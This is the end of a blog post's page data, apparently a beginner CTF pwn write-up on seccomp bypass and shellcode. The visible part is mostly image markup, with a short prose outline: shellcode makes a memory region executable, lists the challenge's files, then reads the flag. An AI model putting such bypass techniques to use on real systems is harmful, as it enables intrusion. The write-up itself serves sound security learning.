class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABIklEQVQY05WQyXaDMAxFHRuDmYKdhAyUEKZgp9C0+f+PexXuoptuurhHsoZnSex4K1C7HaZXhX654NqPGN6/0NonmvGB+/Ki2ITOLminGc3gcO3ucPMM5yjetbhP9H5YRFEIxjcBurZHdamRqgiLfcPQHPAYS1xOBkEgCA5JNpSBRwjumznnlAs8QggwxlYY+qFDYTQE+eeUocrIKgb9U/A/IhXi1jbIt1uaMEStE1RaoVISXaRQJDFkGNJEEeI4RpIkULQJ55u/BevbFZZu8fFcMAw9xnHATPcZyXfO+vsYY3A8HbE/7KF1gbIskWUppJQkrugj9bvyp51wOp99Qb7NsdsZajjAkNUklGYZ0jQhKJ9nfsI1l+e597XWnnWDVfAbnmmOgkLF9v8AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c87e5077608da42966ac5c8c71449aff/8ac56/image-20240628225954737.webp 240w,\n/static/c87e5077608da42966ac5c8c71449aff/d3be9/image-20240628225954737.webp 480w,\n/static/c87e5077608da42966ac5c8c71449aff/33b41/image-20240628225954737.webp 765w\"\n              sizes=\"(max-width: 765px) 100vw, 765px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c87e5077608da42966ac5c8c71449aff/8ff5a/image-20240628225954737.png 240w,\n/static/c87e5077608da42966ac5c8c71449aff/e85cb/image-20240628225954737.png 480w,\n/static/c87e5077608da42966ac5c8c71449aff/bbb77/image-20240628225954737.png 765w\"\n            sizes=\"(max-width: 765px) 100vw, 765px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c87e5077608da42966ac5c8c71449aff/bbb77/image-20240628225954737.png\"\n            alt=\"image-20240628225954737\"\n            title=\"image-20240628225954737\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>In this code, after granting write and execute permission to the region starting at <code class=\"language-text\">0x404000</code>, Shell Code embedded in that region enumerates files under <code class=\"language-text\">/app/ctf4b</code>.</p>\n<p>Then, Shell Code containing the identified Flag file name is received again from input and executed to retrieve the Flag.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>In this article I summarized what I learned about seccomp bypass techniques and Shell Code basics.</p>\n<p>There are likely other solutions to bypass the <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> constraints, and I’d like to add alternative approaches in future updates.</p>","fields":{"slug":"/ctf-pwn-gachi-rop-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-06-28","description":"A Beginner CTFer's Pwn Crash Course 2 - seccomp Bypass and Shell Code Basics -","tags":["Rev (en)","Pwn (en)","English"],"title":"A Beginner CTFer's Pwn Crash Course 2 - seccomp Bypass and Shell Code Basics -","socialImage":{"publicURL":"/static/9462c8366543bfec55e4deb4c567ebd2/ctf-pwn-gachi-rop.png"}}}},"pageContext":{"slug":"/ctf-pwn-gachi-rop-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}